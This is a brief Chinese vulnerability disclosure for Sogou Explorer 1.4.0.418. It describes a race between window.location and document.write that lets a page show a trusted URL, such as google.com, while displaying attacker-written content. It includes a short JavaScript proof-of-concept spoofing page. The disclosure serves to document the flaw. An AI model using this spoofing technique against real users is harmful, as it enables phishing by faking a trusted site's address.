搜狗浏览器版本:1.4.0.418(正式版)
出处:http://hi.baidu.com/xisigr/blog/item/4778813ffd06e2f1828b1384.html
漏洞成因:在搜狗浏览器中,window.location和document.write两个函数发生条件竞争阻塞。“window.location”函数使URL中显示到一个地址域,同时页面元素却可以被“document.write”函数所改写。这样导致攻击者可以篡改页面,来实施钓鱼欺骗攻击。
08eeaf59492bcfea9c82049c.png
POC:
<center>
<h1>SogouExplorer spoofing</h1>
</center>
<p>
<a href="javascript:spoof()">test!</a>
<p>
<script>
function spoof()
{
window.location = "http://www.google.com";
document.write("<title>Google</title>");
document.write("<h1>FAKE PAGE</h1>");
document.write("xisigr[xeye]");
}
</script>
其他说明: 无
0 条评论。